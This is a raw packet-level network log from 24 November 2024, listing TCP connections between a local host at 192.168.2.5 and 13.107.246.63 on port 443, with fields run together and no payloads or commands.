                                                                                                                                                                                        Nov 24, 2024 02:14:58.534857988 CET49997443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.534872055 CET4434999713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.799700975 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.800558090 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.800640106 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.801158905 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.801177025 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.856551886 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.857467890 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.857501030 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.858006954 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.858011961 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.886570930 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.887295008 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.887320995 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.887927055 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.887933016 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.985358000 CET4434999713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988405943 CET4434999713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988481998 CET49997443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988565922 CET49997443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988565922 CET49997443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988609076 CET4434999713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.988658905 CET4434999713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.992122889 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.992162943 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:58.992320061 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.992522001 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:58.992542028 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.260828972 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.263993025 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264055967 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264085054 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264158010 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264202118 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264202118 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264260054 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.264287949 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.267110109 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.267162085 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.267261982 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.267452002 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.267482996 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312372923 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312534094 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312599897 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312704086 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312720060 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312748909 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.312755108 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.315886021 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.315908909 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.315985918 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.316118956 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.316128969 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.339030981 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342098951 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342195034 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342228889 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342248917 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342259884 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.342266083 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.345335007 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.345410109 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:59.345514059 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.345663071 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:59.345696926 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.289952993 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.290472031 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.290489912 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.290957928 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.290963888 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.711122036 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.711627007 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.711671114 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.712049007 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.712057114 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.734057903 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737020969 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737082958 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737101078 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737138987 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737194061 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737235069 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737251997 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737253904 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.737260103 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.740508080 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.740561962 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:00.740653992 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.740781069 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:00.740792036 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.031651974 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.032216072 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.032239914 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.032655001 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.032660961 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.053307056 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.053736925 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.053802967 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.054131031 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.054145098 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.123298883 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.123857021 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.123899937 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.124294043 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.124305964 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.183382034 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189301968 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189384937 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189430952 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189454079 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189467907 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.189475060 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.192336082 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.192363024 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.192464113 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.192621946 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.192631960 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.468782902 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.471896887 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.471977949 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.472047091 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.472073078 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.472083092 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.472089052 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.474869967 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.474912882 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.474988937 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.475138903 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.475152016 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.500710011 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.503824949 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.503879070 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.503892899 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.503940105 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.504004955 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.504024982 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.504040003 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.504046917 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.506807089 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.506834030 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.506907940 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.507049084 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.507061005 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.566212893 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569464922 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569540977 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569603920 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569626093 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569672108 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.569683075 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.572062969 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.572096109 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:01.572170973 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.572303057 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:01.572314978 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.596636057 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.597138882 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:02.597155094 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.597589016 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:02.597593069 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.946806908 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.947359085 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:02.947423935 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:02.947823048 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:02.947837114 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.042634010 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.045442104 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.045536995 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.053709984 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.053724051 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.053734064 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.053739071 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.057792902 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.057832003 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.057904959 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.058727980 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.058747053 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.194292068 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.220557928 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223036051 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223051071 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223522902 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223531961 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223787069 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.223886013 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.224186897 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.224199057 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.382157087 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385179043 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385251999 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385265112 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385340929 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385468006 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385485888 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385497093 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385497093 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385503054 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.385509968 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.388366938 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.388401985 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.389429092 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.389647961 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.389663935 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.415725946 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.418411970 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.418435097 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.419156075 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.419161081 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.631819963 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.634996891 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.635068893 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.635112047 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.635130882 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.635142088 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.635149002 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.638295889 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.638329029 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.638394117 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.638614893 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.638629913 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.654812098 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.657922983 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.658010960 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.658077955 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.658103943 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.658122063 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.658129930 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.661422968 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.661474943 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.662318945 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.662318945 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.662358999 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.869369984 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872459888 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872522116 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872589111 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872589111 CET50011443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872607946 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.872617960 CET4435001113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.876050949 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.876107931 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:03.876187086 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.876344919 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:03.876360893 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:04.839739084 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:04.840527058 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:04.840543985 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:04.841754913 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:04.841763020 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.102813005 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.103897095 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.103915930 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.104384899 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.104389906 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.282422066 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285603046 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285814047 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285890102 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285914898 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285931110 CET50012443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.285938025 CET4435001213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.289026022 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.289079905 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.289160013 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.289310932 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.289326906 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.444617987 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.445161104 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.445187092 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.445677996 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.445691109 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.483620882 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.484117985 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.484143972 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.484786987 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.484802008 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.557672977 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.557755947 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.557856083 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.558062077 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.558083057 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.558104038 CET50013443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.558111906 CET4435001313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.561763048 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.561827898 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.561888933 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.562068939 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.562083960 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.656325102 CET4435001613.107.246.63192.168.2.5
